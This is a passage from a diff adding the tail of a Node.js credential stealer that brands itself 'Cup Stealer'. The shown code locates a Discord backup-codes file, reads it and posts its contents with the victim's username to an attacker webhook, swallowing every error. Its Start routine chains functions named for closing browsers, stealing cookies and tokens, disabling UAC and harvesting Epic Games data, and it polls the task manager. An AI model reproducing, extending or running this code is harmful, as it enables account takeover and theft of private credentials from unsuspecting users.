+ for (const currentFile of files) {
2165
+ if (currentFile === 'discord_backup_codes.txt') {
2166
+ const sourceFilePath = path.join(folderPath, currentFile);
2167
+ const destinationFilePath = path.join(mainFolderPath, currentFile);
2168
+
2169
+ try {
2170
+ await fs.promises.copyFile(sourceFilePath, destinationFilePath);
2171
+
2172
+ const embed = {
2173
+ title: '',
2174
+ color: 0x050000,
2175
+ author: {
2176
+ name: `${process.env.USERNAME} | Discord backup codes Found`,
2177
+ icon_url: "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024"
2178
+ },
2179
+ description: `\`\`\`${destinationFilePath}\n\n${fs.readFileSync(destinationFilePath, 'utf-8')}\`\`\``,
2180
+ footer: {
2181
+ text: `Cup Stealer | ${process.env.username}`,
2182
+ icon_url: "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024"
2183
+ },
2184
+ timestamp: new Date()
2185
+ };
2186
+
2187
+ const backup_codes = {
2188
+ embeds: [embed],
2189
+ };
2190
+
2191
+ try {
2192
+ await axios.post(webhook_url, backup_codes);
2193
+ } catch (error) {
2194
+ }
2195
+ } catch (error) {
2196
+ }
2197
+ }
2198
+ }
2199
+ } catch (err) {
2200
+ }
2201
+ }
2202
+ }
2203
+
2204
+
2205
+ function onlyUnique(item, index, array) {
2206
+ return array.indexOf(item) === index;
2207
+ }
2208
+
2209
+ async function Start() {
2210
+ setInterval(checkTaskManager, 3000);
2211
+
2212
+ await closeBrowsers();
2213
+ await getEncrypted();
2214
+ await getCookiesAndSendWebhook();
2215
+ await stealTokens();
2216
+ await foundDiscordBackupCodes();
2217
+ await disableuac();
2218
+ await SubmitEpicGames();
2219
+ }
2220
+
2221
+ if (require.main === module) {
2222
+ Start();
2223
+ }